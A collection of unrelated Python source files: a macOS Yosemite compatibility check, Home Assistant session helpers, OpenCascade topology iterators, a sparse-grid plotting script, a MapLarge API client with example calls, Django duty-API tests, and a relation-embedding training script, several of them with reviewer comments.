    pass
def main(argv=None):
    """Run all Yosemite-compatibility checks and return an exit status.

    Returns 0 when all checks pass (supported), 1 otherwise.  When munki is
    installed, also records the result in ConditionalItems.plist.

    NOTE(review): `update_munki_conditional_items` is a module-level global
    defined outside this chunk -- confirm it is set before main() runs.
    """
    yosemite_supported_dict = {}
    yosemite_needs_fw_update_dict = {}  # NOTE(review): never populated in this chunk
    # Run the checks
    board_id_passed = is_supported_board_id()
    memory_passed = has_required_amount_of_memory()
    cpu_passed = is_64bit_capable()
    system_version_passed = is_system_version_supported()
    if board_id_passed and memory_passed and cpu_passed and system_version_passed:
        yosemite_supported = 0
        yosemite_supported_dict = {'yosemite_supported': True}
    else:
        yosemite_supported = 1
        yosemite_supported_dict = {'yosemite_supported': False}
    # Update "ConditionalItems.plist" if munki is installed
    if munki_installed() and update_munki_conditional_items:
        append_conditional_items(yosemite_supported_dict)
    # Exit codes:
    # 0 = Yosemite is supported
    # 1 = Yosemite is not supported
    return yosemite_supported
if __name__ == '__main__':
    # Exit status: 0 = Yosemite supported, 1 = not supported (consumed by munki)
    sys.exit(main())
|
<gh_stars>1-10
import asyncio
import inspect
import json
import logging
import os
from typing import Dict, Final, Mapping, Optional, TYPE_CHECKING, Tuple, Type
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers.typing import HomeAssistantType
from .api import API, MoscowPGUException, Profile, ResponseError
from .const import DATA_SESSION_LOCK, DOMAIN, SUPPORTED_PLATFORMS
if TYPE_CHECKING:
from ._base import MoscowPGUEntity
_LOGGER: Final = logging.getLogger(__name__)
@callback
def async_get_lock(hass: HomeAssistantType):
    """Return the hass-wide lock guarding the sessions file, creating it lazily."""
    lock = hass.data.get(DATA_SESSION_LOCK)
    if lock is None:
        lock = asyncio.Lock()
        hass.data[DATA_SESSION_LOCK] = lock
    return lock
def read_sessions_file(hass: HomeAssistantType) -> Tuple[Dict[str, str], str]:
    """Read the integration's sessions file.

    Returns a (sessions mapping, file path) tuple; the mapping is empty when
    the file is missing or contains invalid JSON.
    """
    path = hass.config.path(os.path.join(".storage", DOMAIN + ".sessions"))
    sessions = {}
    if os.path.isfile(path):
        with open(path, "rt") as file_obj:
            try:
                sessions = json.load(file_obj)
            except json.JSONDecodeError:
                # Corrupt file: fall back to an empty mapping
                pass
    return sessions, path
async def async_load_session(hass: HomeAssistantType, username: str) -> Optional[str]:
    """Return the stored session id for `username`, or None when absent.

    The file read happens under the shared session lock.
    """
    async with async_get_lock(hass):
        sessions, _ = read_sessions_file(hass)
        return sessions.get(username)
async def async_save_session(hass: HomeAssistantType, username: str, session_id: str) -> None:
    """Persist `session_id` for `username` in the sessions file.

    Read-modify-write of the JSON file under the shared session lock.
    """
    async with async_get_lock(hass):
        sessions, filename = read_sessions_file(hass)
        sessions[username] = session_id
        with open(filename, "w") as file_obj:
            json.dump(sessions, file_obj)
async def async_authenticate_api_object(
    hass: HomeAssistantType,
    api: API,
    skip_session: bool = False,
) -> "Profile":
    """Authenticate `api` (fresh login or cached session) and return its profile.

    When no cached session exists (or `skip_session` is set) a fresh login is
    performed and the resulting session id is persisted.  If fetching the
    profile then fails with anything other than a 502 response, the function
    retries exactly once with a forced fresh login (skip_session=True).
    """
    username = api.username
    if api.session_id is None or skip_session:
        _LOGGER.debug('Authenticating with user "%s"', username)
        try:
            await api.authenticate()
        except ResponseError as exc:
            # NOTE(review): only 502 is re-raised here; any other ResponseError
            # is swallowed and execution falls through to saving the session --
            # confirm this is intentional.
            if exc.error_code == 502:
                raise
        _LOGGER.debug('Authentication successful for user "%s"', username)
        await async_save_session(hass, username, api.session_id)
        _LOGGER.debug('Saved session for user "%s"', username)
    else:
        _LOGGER.debug('Loaded session for user "%s"', username)
    try:
        return await api.get_profile()
    except MoscowPGUException as e:
        # 502 errors and second-attempt failures propagate; everything else
        # triggers a single retry with a forced re-login.
        if (isinstance(e, ResponseError) and e.error_code == 502) or skip_session:
            raise
        return await async_authenticate_api_object(hass, api, True)
def generate_guid():
    """Return a random 32-character lowercase hexadecimal identifier."""
    import uuid

    return uuid.uuid4().hex
@callback
def find_existing_entry(hass: HomeAssistantType, username: str) -> Optional[ConfigEntry]:
    """Return this domain's config entry matching `username`, or None."""
    return next(
        (
            entry
            for entry in hass.config_entries.async_entries(DOMAIN)
            if entry.data[CONF_USERNAME] == username
        ),
        None,
    )
def load_platforms_base_classes() -> Mapping[str, Type["MoscowPGUEntity"]]:
    """Map each supported platform name to its module's BASE_CLASS entity type."""
    base_classes = {}
    for platform in SUPPORTED_PLATFORMS:
        # fromlist=("BASE_CLASS",) makes __import__ return the leaf module
        module = __import__(
            f"custom_components.{DOMAIN}." + platform, globals(), locals(), ("BASE_CLASS",)
        )
        base_classes[platform] = module.BASE_CLASS
    return base_classes
def all_subclasses(cls, include_abstract: bool = False):
    """Return the set of all (transitive) subclasses of `cls`.

    Abstract classes are excluded from the result unless `include_abstract`
    is True; the recursion still descends through them either way.
    """
    direct = cls.__subclasses__()
    if include_abstract:
        collected = set(direct)
    else:
        collected = {subclass for subclass in direct if not inspect.isabstract(subclass)}
    for child in direct:
        collected |= all_subclasses(child, include_abstract)
    return collected
|
# coding: utf-8
r"""iteration.py module
Summary
-------
This module helps looping through topology
"""
import OCC.BRep
import aocutils.topology
import aocutils.brep.edge
class EdgePairsFromWire(object):
    r"""Helper class to loop through a wire and return ordered pairs of edges

    Yields [previous, current] pairs of consecutive edges; the final pair
    wraps around to the first edge.  Python 2 iterator (defines next(), not
    __next__()).

    Parameters
    ----------
    wire : OCC.TopoDS.TopoDS_Wire
    """
    def __init__(self, wire):
        self.wire = wire
        self.edge_pairs = list()
        self.prev_edge = None  # NOTE(review): unused; self.previous_edge is used instead
        # Generator over the wire's edges in topological order
        self.wire_explorer = aocutils.topology.WireExplorer(self.wire).ordered_edges()
        self.number_of_edges = self.wire_explorer.__length_hint__()
        self.previous_edge = None
        self.current_edge = None
        self.first_edge = None
        self.index = 0
    def next(self):
        r"""next() method to make EdgePairsFromWire an iterable

        Returns
        -------
        list of two edges: [previous, current]; the last pair closes the loop
        back to the first edge.  NOTE(review): iterating past the last pair
        relies on the underlying explorer generator raising StopIteration --
        confirm.
        """
        if self.index == 0:
            # first edge, need to set self.previous_edge
            self.previous_edge = self.wire_explorer.next()
            self.current_edge = self.wire_explorer.next()
            self.first_edge = self.previous_edge  # for the last iteration
            self.index += 1
            return [self.previous_edge, self.current_edge]
        elif self.index == self.number_of_edges-1:
            # no next edge: close the loop with the first edge
            self.index += 1
            return [self.current_edge, self.first_edge]
        else:
            self.previous_edge = self.current_edge
            self.current_edge = self.wire_explorer.next()
            self.index += 1
            return [self.previous_edge, self.current_edge]
    def __iter__(self):
        return self
class LoopWirePairs(object):
    r"""For looping through consecutive wires assures that the returned edge pairs are ordered

    For each vertex of wire A, finds the closest vertex of wire B and yields
    the two edges incident to each vertex, with B's pair ordered so that the
    edges correspond geometrically (midpoint proximity).  Python 2 iterator.

    Parameters
    ----------
    wire_a : OCC.TopoDS.TopoDS_Wire
    wire_b : OCC.TopoDS.TopoDS_Wire
    """
    def __init__(self, wire_a, wire_b):
        self.wireA = wire_a
        self.wireB = wire_b
        self.wire_explorer_a = aocutils.topology.WireExplorer(self.wireA)
        self.wire_explorer_b = aocutils.topology.WireExplorer(self.wireB)
        self.topo_a = aocutils.topology.Topo(self.wireA)
        self.topo_b = aocutils.topology.Topo(self.wireB)
        self.brep_tool = OCC.BRep.BRep_Tool()
        self.vertices_a = [v for v in self.wire_explorer_a.ordered_vertices()]
        self.vertices_b = [v for v in self.wire_explorer_b.ordered_vertices()]
        self.edges_a = [v for v in aocutils.topology.WireExplorer(wire_a).ordered_edges()]
        self.edges_b = [v for v in aocutils.topology.WireExplorer(wire_b).ordered_edges()]
        # Precomputed 3D points of wire B's vertices for distance queries
        self.pnts_b = [self.brep_tool.Pnt(v) for v in self.vertices_b]
        self.number_of_vertices = len(self.vertices_a)
        self.index = 0
    def closest_point(self, vertex_from_wire_a):
        r"""Closest vertex in the wire b to a vertex from wire a

        Parameters
        ----------
        vertex_from_wire_a

        Returns
        -------
        OCC.TopoDS.TopoDS_Vertex
        """
        pt = self.brep_tool.Pnt(vertex_from_wire_a)
        distances = [pt.Distance(i) for i in self.pnts_b]
        # NOTE(review): despite its name, this is the index of the MINIMUM
        # distance, i.e. the closest vertex -- which matches the docstring.
        indx_max_dist = distances.index(min(distances))
        return self.vertices_b[indx_max_dist]
    def next(self):
        r"""next() method to make LoopWirePairs an iterable

        Returns
        -------
        (iter over A's two incident edges, iter over B's two incident edges),
        with B's edges ordered by midpoint proximity to A's first edge.
        """
        if self.index == self.number_of_vertices:
            raise StopIteration
        vert = self.vertices_a[self.index]
        closest = self.closest_point(vert)
        edges_a = self.topo_a.edges_from_vertex(vert)
        edges_b = self.topo_b.edges_from_vertex(closest)
        edge_a1, edge_a2 = aocutils.brep.edge.Edge(edges_a.next()), aocutils.brep.edge.Edge(edges_a.next())
        edge_b1, edge_b2 = aocutils.brep.edge.Edge(edges_b.next()), aocutils.brep.edge.Edge(edges_b.next())
        mp_a = edge_a1.mid_point()[1]
        self.index += 1
        # Order B's edges so the first is the geometric counterpart of edge_a1
        if mp_a.Distance(edge_b1.mid_point()[1]) < mp_a.Distance(edge_b2.mid_point()[1]):
            return iter([edge_a1, edge_a2]), iter([edge_b1, edge_b2])
        else:
            return iter([edge_a1, edge_a2]), iter([edge_b2, edge_b1])
    def __iter__(self):
        return self
|
#!/usr/bin/python3
# number of output figures = 4
import random
import numpy as np
import helper.basis
from helper.figure import Figure
import helper.grid
import helper.plot
def getChain(l1, i1, l2, i2, T):
  """Build the chain of (level, index) pairs from (l1, i1) to (l2, i2).

  Each step replaces one coordinate t in T with the target value from
  (l2, i2).  Returns the chain as a list of (level array, index array)
  tuples, or None when T does not cover every differing coordinate.
  """
  chain = [(np.array(l1), np.array(i1))]
  for t in T:
    prev_l, prev_i = chain[-1]
    next_l, next_i = np.array(prev_l), np.array(prev_i)
    next_l[t], next_i[t] = l2[t], i2[t]
    chain.append((next_l, next_i))
  final_l, final_i = chain[-1]
  if np.array_equal(final_l, l2) and np.array_equal(final_i, i2):
    return chain
  return None
def main():
  """Plot a randomly refined sparse grid and, for q >= 1, the grid closure
  induced by different hierarchical bases (one output figure per q)."""
  # n = level, d = dimension, b = boundary parameter
  n, d, b = 3, 2, 1
  numberOfRefinements = 20
  seed = 1
  T = [0, 1]  # coordinates replaced when chaining between grid points
  X, L, I = helper.grid.RegularSparseBoundary(n, d, b).generate()
  N = L.shape[0]
  grid = helper.grid.SpatiallyAdaptiveSparse(L, I)
  refinementCounter = 0
  random.seed(seed)
  # Refine random points until numberOfRefinements refinements actually
  # increased the grid size
  while refinementCounter < numberOfRefinements:
    k = random.randrange(N)
    grid.refine(k)
    newN = grid.L.shape[0]
    if newN > N:
      N = newN
      refinementCounter += 1
  for q in range(4):
    fig = Figure.create(figsize=(2, 2), scale=0.85)
    ax = fig.gca()
    X, L, I = grid.getGrid()
    N = X.shape[0]
    # Unit square outline plus the original grid points
    ax.plot([0, 1, 1, 0, 0], [0, 0, 1, 1, 0], "k-")
    ax.plot(X[:,0], X[:,1], "k.", clip_on=False)
    if q >= 1:
      # q selects the 1D basis whose closure is computed
      if q == 1: basis1D = helper.basis.HierarchicalBSpline(1)
      elif q == 2: basis1D = helper.basis.HierarchicalBSpline(3)
      elif q == 3: basis1D = helper.basis.HierarchicalWeaklyFundamentalSpline(3)
      basis = helper.basis.TensorProduct(basis1D, d)
      oldN = 0
      LI = np.hstack((L, I))
      # Fixed-point iteration: add intermediate chain points until stable
      while oldN < N:
        print(N)
        oldN = N
        oldX, oldL, oldI = X, L, I
        for k1 in range(N):
          for k2 in range(N):
            chain = getChain(L[k1], I[k1], L[k2], I[k2], T)
            x2 = np.array([X[k2]])
            # NOTE(review): getChain can return None in general; with
            # T = [0, 1] covering all d = 2 coordinates it never does --
            # confirm if T is ever changed.
            for l, i in chain[1:-1]:
              li = np.hstack((l, i))
              if abs(basis.evaluate(L[k1], I[k1], x2)) > 1e-10:
                if not np.any(np.all(li == LI, axis=1)):
                  LI = np.vstack((LI, li))
        L, I = LI[:,:d], LI[:,d:]
        X = helper.grid.getCoordinates(L, I)
        N = L.shape[0]
      if N > oldN:
        # Mark the points added by the closure in a different color
        K = np.any(np.all(np.hstack((oldL, oldI)) ==
                          np.hstack((L, I))[:,np.newaxis], axis=2), axis=1)
        notK = np.logical_not(K)
        ax.plot(X[notK,0], X[notK,1], ".", clip_on=False)
    #if q in [0, 3]:
    #  helper.plot.plotArrow(ax, [0.27, 0.81], [0.39, 0.81], scaleHead=0.5)
    #  helper.plot.plotArrow(ax, [0.29, 0.79], [0.29, 0.91], scaleHead=0.5)
    #  ax.text(0.41, 0.81, r"$x_1$", ha="left", va="center")
    #  ax.text(0.29, 0.92, r"$x_2$", ha="center", va="bottom")
    ax.set_axis_off()
    fig.save()
if __name__ == "__main__":
  # Entry point: generates the four output figures
  main()
|
import urllib2
import urllib
import urlparse
import json
import mimetypes
import mimetools
class MapLargeConnector(object):
    """Connection to a MapLarge API server (Python 2 / urllib2 based).

    Credentials are either a password (str, exchanged for a token at
    construction time) or an auth token (int, used verbatim).
    """
    ###
    # Creates a connection to a MapLarge API server
    ###
    ###
    # When NO_WEB_CALLS is true all MapLargeConnectors will not make remote
    # calls. Instead, the response will be the full URL that would have been
    # invoked.
    ###
    NO_WEB_CALLS = False
    __user = None
    __token = None
    __apiserver = None
    __authstring = ""
    __password = None
    # Headers added to every POST request
    __defaultHeaders = [('User-agent', 'MapLarge SDK Python')]
    def __init__(self, server, user, passwordOrToken=None):
        """
        Constructor. Creates a connection to a MapLarge API server with a
        username and token as credentials.
        @param server: URL of API server. Must begin with valid protocol
        @param user: Username to use for connection credentials.
        @param passwordOrToken: Authentication token/password to use for connection credentials.
        @raise ValueError:
        """
        try:
            self.__apiserver = server
            self.__user = user
            # int -> treat as a ready-made token; str -> exchange password for a token
            if isinstance(passwordOrToken, int):
                self.__token = str(passwordOrToken)
            elif isinstance(passwordOrToken, str):
                self.__token = self.__GetToken(passwordOrToken)
            else:
                raise ValueError, "No Password or Token"
            self.__authstring = "mluser=" + self.__user + "&mltoken=" + self.__token;
        except Exception as e:
            raise e
    def __GetToken(self, password):
        """Exchange a password for an auth token via Auth/Login.

        Returns the token string, or "ERROR" on any failure.
        NOTE(review): __authstring is still "" when this runs (it is set
        after __GetToken returns), so the appended "&" + __authstring is a
        no-op here -- confirm intended.
        """
        try:
            querystring = urllib.urlencode({"mluser": self.__user, "mlpass": password}) + "&" + self.__authstring
            if self.NO_WEB_CALLS:
                retVal = querystring
            else:
                response = self.__InvokeURL("Auth", "Login", querystring)
                respObj = json.loads(response)
                success = respObj['success']
                if success == True:
                    retVal = respObj['token']
                else:
                    retVal = "ERROR"
        except Exception as e:
            print e
            retVal = "ERROR"
        return retVal
    def __InvokeURL(self, controller, actionname, params):
        """GET <apiserver>/<controller>/<actionname>?<params>.

        Returns the response body, the would-be URL when NO_WEB_CALLS is
        set, or "ERROR" on exception.
        """
        try:
            urlstring = urlparse.urljoin(self.__apiserver, controller + "/" + actionname)
            urlstring = urlstring + '?' + params
            if self.NO_WEB_CALLS:
                retVal = urlstring
            else:
                flob = urllib2.urlopen(urllib2.Request(urlstring))
                retVal = flob.read()
        except Exception as e:
            print e
            retVal = "ERROR"
        return retVal
    def __InvokePostURL(self, controller, actionname, params, filepaths):
        """POST multipart/form-data with `params` fields plus optional file
        uploads to <apiserver>/<controller>/<actionname>.

        Returns the response body, the would-be URL when NO_WEB_CALLS is
        set, or "ERROR" on exception.
        """
        try:
            urlstring = urlparse.urljoin(self.__apiserver, controller + "/" + actionname)
            if self.NO_WEB_CALLS:
                retVal = urlstring
            else:
                # Build the multipart body by hand (Python 2 stdlib has no helper)
                part_boundary = '--' + mimetools.choose_boundary()
                CRLF = '\r\n'
                L = []
                for (key, val) in params.items():
                    L.append('--' + part_boundary)
                    L.append('Content-Disposition: form-data; name="%s"' % key)
                    L.append('')
                    L.append(val)
                files = []
                for fileName in filepaths:
                    fileBody = open(fileName, "rb").read()
                    L.append('--' + part_boundary)
                    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('fileUpload', fileName))
                    fileContentType = mimetypes.guess_type(fileName)[0] or 'application/octet-stream'
                    L.append('Content-Type: %s' % fileContentType)
                    L.append('')
                    L.append(fileBody)
                L.append('--' + part_boundary + '--')
                L.append('')
                #files = {'file': {'filename': 'F.DAT', 'content': 'DATA HERE'}}
                postData = body = CRLF.join(L)
                request = urllib2.Request(urlstring)
                for name, value in self.__defaultHeaders:
                    request.add_header(name, value)
                # conn.ContentType = "multipart/form-data; boundary=" + boundary;
                request.add_header('Content-type', 'multipart/form-data; boundary=%s' % part_boundary)
                request.add_header('Content-length', len(postData))
                request.add_data(postData)
                resp = urllib2.urlopen(request)
                retVal = resp.read()
        except Exception as e:
            print e
            retVal = "ERROR"
        return retVal
    def InvokeAPIRequestPost(self, action, params, filepaths=None):
        """
        @param action: Name of API action being called.
        @param params: dict of key value pairs.
        @param filepaths: List of filename(s) to upload. Do not pass of not required.
        @return : API response, usually a JSON formatted string. Returns "ERROR" on exception.
        """
        try:
            # Credentials are sent as ordinary form fields on POST requests
            params["mluser"] = self.__user;
            params["mltoken"] = self.__token;
            if (filepaths == None):
                retval = self.__InvokePostURL("Remote", action, params, [])
            else:
                retval = self.__InvokePostURL("Remote", action, params, filepaths)
        except Exception as e:
            print e
            retval = "ERROR"
        return retval
    def InvokeAPIRequest(self, action, params, filepaths=None):
        """
        @param action: Name of API action being called.
        @param params: dict of key value pairs.
        @return : API response, usually a JSON formatted string. Returns "ERROR" on exception.
        """
        # NOTE(review): `filepaths` is accepted but never used on GET requests.
        try:
            querystring = urllib.urlencode(params) + "&" + self.__authstring
            retVal = self.__InvokeURL("Remote", action, querystring)
        except Exception as e:
            print e
            retVal = "ERROR"
        return retVal
    def GetRemoteAuthToken(self, user, password, ipaddress):
        """
        @param user: Username to create authentication token for
        @param password: Password for supplied username
        @param ipaddress: IP address of the user for whom you want to build an authentication token
        @return: The authentication token in String form.
        """
        try:
            retVal = self.__InvokeURL("Auth", "RemoteLogin",
                                      "mluser=" + user + "&mlpass=" + password + "&remoteIP=" + ipaddress);
        except Exception as e:
            print e
            retVal = "ERROR"
        return retVal
##DEFAULT CREDENTIALS
server = "http://server.maplarge.com/"
user = "<EMAIL>"
pw = "pw123456"
token = <PASSWORD>
#CREATE MAPLARGE CONNECTION WITH USER / PASSWORD
mlconnPassword = MapLargeConnector(server, user, pw)
#CREATE MAPLARGE CONNECTION WITH USER / AUTH TOKEN
mlconnToken = MapLargeConnector(server, user, token)
#CREATE TABLE SYNCHRONOUS (NO WEB CALL)
params = {"account": "aidsvualpha", "tablename": "testPythonSdkTable", "fileurl": "http://localhost/testfile.csv"}
mlconnToken.NO_WEB_CALLS = True
response = mlconnToken.InvokeAPIRequest("CreateTableSynchronous", params)
print response
mlconnPassword.NO_WEB_CALLS = False
#RETRIEVE REMOTE USER AUTH TOKEN
response = mlconnPassword.GetRemoteAuthToken(user, pw, "255.255.255.255")
print response
#List Groups
params = {"account": "aidsvualpha"}
response = mlconnPassword.InvokeAPIRequestPost("ListGroups", params)
print response
#CREATE TABLE WITH FILES SYNCHRONOUS
params = {"account": "aidsvualpha", "tablename": "testTable"}
fileList = ["c:\\temp\\usa.csv"]
print mlconnPassword.InvokeAPIRequestPost("CreateTableWithFilesSynchronous", params, fileList)
|
<reponame>iqDF/Django-Custom-User<gh_stars>1-10
from django.urls import reverse
from django.contrib.auth import get_user_model
from django.test.client import Client
from rest_framework import status
from rest_framework.test import APITestCase
from utils.random_support import RandomSupport
from duty_api.serializers import DutySerializer
from duty_api.models import Duty, DutyManager
User = get_user_model()
class DutyAPITests(APITestCase, RandomSupport):
    """Test endpoints in `duties/api/` API.
    """
    client = Client()
    def create_user(self, name=None, email=None, password=None):
        """Helper that create mock user that is:
        - is_active (bool) True
        - is_staff (bool) & is_superuser (bool) are False
        - credential using email & password field
        Args:
            name (str): name for user, generate random name if None
            email (str): email for credential, generate random email if None
            password (str): password for credential, generate random password if None
        Returns:
            user (User)
        """
        # random generate value if not specified
        name = name if name else self.generate_name()
        email = email if email else self.generate_email()
        # BUG FIX: `self.<PASSWORD>()` was an anonymization artifact (invalid
        # syntax); restored to the RandomSupport generator, matching
        # generate_name()/generate_email() above.
        password = password if password else self.generate_password()
        # create user with specified model fields
        user = User.objects.create_user(
            name=name, email=email, password=password
        )
        user.save()
        return user
    def setUp(self):
        # setup duty manager
        self.duty_manager = DutyManager()
        # setup mock user credentials
        self.email = self.generate_email()
        # BUG FIX: `<PASSWORD>(10)` was an anonymization artifact (invalid
        # syntax); restored to a random 10-character password.
        self.password = self.generate_password(10)
        self.user = self.create_user(email=self.email, password=self.password)
    def test_request_get_started_duty(self):
        """Test GET duty is valid only if active duty is associated with
        the authenticated user.
        """
        # initially no duty associated, hence DoesNotExist is raised
        with self.assertRaises(Duty.DoesNotExist):
            duty = self.user.duty
        # authenticate & login user
        is_logged_in = self.client.login(email=self.email, password=self.password)
        self.assertTrue(is_logged_in)
        # GET expect Http400 or 404 since no duty ever associated with user before.
        response = self.client.get(reverse('duty-api'))
        self.assertIn(response.status_code,
            [status.HTTP_400_BAD_REQUEST, status.HTTP_404_NOT_FOUND]
        )
        # start/create duty associated with user internally
        self.duty_manager.start_duty(self.user)
        # verify duty is created in duty manager and associated to user
        self.assertIsNotNone(self.duty_manager.duty)
        self.assertIs(self.duty_manager.duty, self.user.duty)
        # GET expect Http200 success since duty is associated with authenticated user
        serialized = DutySerializer(self.user.duty)
        response = self.client.get(reverse('duty-api'))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('payload'), serialized.data)
    def test_request_post_create_duty(self):
        """Test POST duty is valid if user has not associated with any duty and
        no duty is active in duty manager.
        """
        # initially no duty associated, hence DoesNotExist is raised
        with self.assertRaises(Duty.DoesNotExist):
            duty = self.user.duty
        # initially no duty is active in duty manager
        self.assertIsNone(self.duty_manager.duty)
        # authenticate & login user
        is_logged_in = self.client.login(email=self.email, password=self.password)
        self.assertTrue(is_logged_in)
        # POST expect Http200 success since creation is valid
        response = self.client.post(reverse('duty-api'))
        self.user.refresh_from_db()  # refresh to get one-one duty
        serialized = DutySerializer(self.user.duty)
        self.assertIn(response.status_code, [status.HTTP_200_OK, status.HTTP_201_CREATED])
        self.assertEqual(response.data.get('payload'), serialized.data)
    def test_request_delete_duty(self):
        """Test DELETE duty is valid only if duty has been finished.
        """
        pass
    def tearDown(self):
        # reset duty manager from any duty associated
        duty_manager = DutyManager()
        duty_manager.reset()
|
<reponame>Huda-Hakami/Context-Guided-Relation-Embeddings
import numpy as np
from wordreps import WordReps
from algebra import cosine, normalize
import tensorflow as tf
import random
from dataset import DataSet
import NLRA_Model
from Eval import eval_SemEval
import sklearn.preprocessing
# ============ End Imports ============
class Training():
	"""Builds, trains and evaluates the NLRA relational-embedding model.

	NOTE(review): relies on module-level globals `WR` (word embeddings),
	`DS` (dataset) and `Ea` (embedding matrix) created in __main__ --
	instantiate only after those exist.
	"""
	def __init__(self):
		# Hyperparameters for compositional-based word pair embeddings (G1)
		self.batchSize=100
		G1_HL=3
		G1_Hdim=WR.dim
		G1_BN=True #boolean variable T/F for batch normalization on G1 MLP
		G1_l2_reg=0.0 # L2 regularization coefficient
		self.G1_pkeep=1.0 # 1.0 means no Dropout applied during training on G1
		# Hyperparameters for LSTM encoder for patterns (G2)
		G2_HL=1
		G2_Hdim=WR.dim
		self.G2_pkeep=1.0 # 1.0 means no Dropout applied during training on G2
		activ='tanh'
		# Create relational model instance and assemble the full graph
		self.RelModel=NLRA_Model.NLRA(activ,self.batchSize)
		self.RelModel.G1_model(Ea,G1_BN,G1_HL,G1_Hdim,G1_l2_reg)
		self.RelModel.G2_rnn_model(DS.max_length,G2_HL,G2_Hdim)
		self.RelModel.define_NLRA_loss()
		self.RelModel.optimize()
		self.sess=tf.Session()
	# --------------------------------------------------
	def Train_NLRA_Model(self):
		"""Train with negative sampling; evaluates on SemEval every epoch and
		keeps the parameters of the best validation accuracy."""
		# Hyperparameters
		self.sess.run(tf.global_variables_initializer())
		n=10 #number of negative patterns for each word-pairs
		epochs=500
		winn_loss=1e7
		win_acc=-1
		Train = DS.Training_triplesIDs
		print ("Number of training triples (a,b,p)",len(Train))
		print ("==========================================================================")
		for epoch in range(epochs):
			# Randomly shuffle training instances for each epoch
			random.shuffle(Train)
			# performance every 20 steps
			if epoch%1==0:
				Pair_Embeddings=self.Gen_Pair_Embeddings()
				acc_1,corr_1=eval_SemEval(Pair_Embeddings,'Test')
				acc_2,corr_2=eval_SemEval(Pair_Embeddings,'Valid')
				acc_3,corr_3=eval_SemEval(Pair_Embeddings,'All')
				print ("Epoch:%d, Acc_Test:%f, Acc_Valid:%f, Acc_All:%f, Corr_Test:%f, Corr_Valid:%f, Corr_All:%f"%(epoch,acc_1,acc_2,acc_3,corr_1,corr_2,corr_3))
				# For early stopping
				if acc_2>win_acc:
					win_acc=acc_2
					self.Save_Trained_Model()
					print ("Parameters and Pair-Embeddings are changed and saved...")
					best_epoch=epoch
					patient_cnt=0
				else:
					patient_cnt+=1
				# NOTE(review): when patience is exhausted this only prints a
				# message; training continues (no break) -- confirm intended.
				if patient_cnt>10:
					print ("early stopping ... epoch number %d"%epoch)
					print ("Winner acc:%f at epoch:%d"%(win_acc,best_epoch))
			# Training
			for minibatch in next_batch(self.batchSize,Train):
				T_batch=Get_Pos_Neg_examples(minibatch,n)
				a_ids,b_ids,p_ids,labels=shred_tuples(T_batch)
				train_data={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:self.G1_pkeep,self.RelModel.is_training:True}
				pattern_seq,early_stop=Pattern_Sequences_withTargetedEntities(a_ids,b_ids,p_ids)
				train_data[self.RelModel.patterns_ids]=pattern_seq
				train_data[self.RelModel.early_stop]=early_stop
				train_data[self.RelModel.G2_pkeep]=self.G2_pkeep
				train_data[self.RelModel.Y_]=labels
				self.sess.run(self.RelModel.train_step,feed_dict=train_data)
	# --------------------------------------------------
	def Save_Trained_Model(self):
		"""Dump the current pair embeddings to res/Pair_Embeddings.npy."""
		Pair_Embeddings_dic=self.Gen_Pair_Embeddings()
		np.save("res/Pair_Embeddings.npy",Pair_Embeddings_dic)
	# --------------------------------------------------
	def Gen_Pair_Embeddings(self):
		"""Return {(a, b): embedding} for all test pairs.

		Each pair embedding is the concatenation of G1 outputs for (a, b)
		and for the reversed pair (b, a)."""
		word_pairs_ids=[(DS.word2id[a],DS.word2id[b]) for (a,b) in DS.Test_Pairs]
		a_ids=[t[0] for t in word_pairs_ids]
		b_ids=[t[1] for t in word_pairs_ids]
		dic={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:1.0,self.RelModel.is_training:False}
		Pair_Embeddings1=self.sess.run(self.RelModel.Last_G1_output,feed_dict=dic)
		a_ids=[t[1] for t in word_pairs_ids]
		b_ids=[t[0] for t in word_pairs_ids]
		dic={self.RelModel.a_ids:a_ids,self.RelModel.b_ids:b_ids,self.RelModel.G1_pkeep:1.0,self.RelModel.is_training:False}
		Pair_Embeddings2=self.sess.run(self.RelModel.Last_G1_output,feed_dict=dic)
		Pair_Embeddings=np.hstack((Pair_Embeddings1,Pair_Embeddings2))
		Pair_Embeddings_dic={}
		for i,(a,b) in enumerate(DS.Test_Pairs):
			Pair_Embeddings_dic[(a,b)]=Pair_Embeddings[i]
		return Pair_Embeddings_dic
# ============ End of the Evaluation class ============
def next_batch(batchSize,data):
	"""Yield consecutive mini-batches of `data`; the last batch may be short."""
	start = 0
	total = len(data)
	while start < total:
		yield data[start:start + batchSize]
		start += batchSize
# -------------------------------------------------------
def Get_Pos_Neg_examples(batch,n):
	"""Expand each (a, b, p) triple into one positive (label 1.0) and `n`
	negatives (label 0.0) whose patterns were never observed for (a, b).

	Negative patterns are sampled from the patterns present in this batch.
	"""
	all_patterns = [p for (_, _, p) in batch]
	T_batch = []
	for (a, b, p) in batch:
		T_batch.append((a, b, p, 1.0))
		corrupted = []
		for _ in range(n):
			candidate = random.sample(all_patterns, 1)[0]
			# Reject patterns actually observed for this word pair
			while candidate in DS.Patterns_per_pair[(DS.id2word[a], DS.id2word[b])]:
				candidate = random.sample(all_patterns, 1)[0]
			corrupted.append((a, b, candidate))
		for (neg_a, neg_b, neg_p) in corrupted:
			T_batch.append((neg_a, neg_b, neg_p, 0.0))
	return T_batch
# -------------------------------------------------------
def shred_tuples(tuples):
	"""Split (a_id, b_id, pattern_id, label) tuples into four parallel lists."""
	a_ids, b_ids, p_ids, label = ([t[k] for t in tuples] for k in range(4))
	return a_ids, b_ids, p_ids, label
# -------------------------------------------------------
def Pattern_Sequences(p_ids):
	"""Convert pattern ids into zero-padded word-id sequences.

	Returns (pattern_seq, early_stop): an array of shape
	(len(p_ids), DS.max_length) and the true length of each pattern.
	"""
	# pattern_seq=[[0 for j in range(DS.max_length)] for i in range(len(p_ids))]
	pattern_seq=np.zeros((len(p_ids),DS.max_length),dtype=int) # padded to max_length; no entity slots here (cf. the *_withTargetedEntities variant)
	early_stop=[]
	for i in range(len(p_ids)):
		pattern=DS.id2Patterns[p_ids[i]]
		words=pattern.strip().split(' ')
		early_stop.append(len(words))
		for j,w in enumerate(words):
			pattern_seq[i,j]=DS.word2id[w]
	return pattern_seq,early_stop
# -------------------------------------------------------
def Pattern_Sequences_withTargetedEntities(a_ids,b_ids,p_ids):
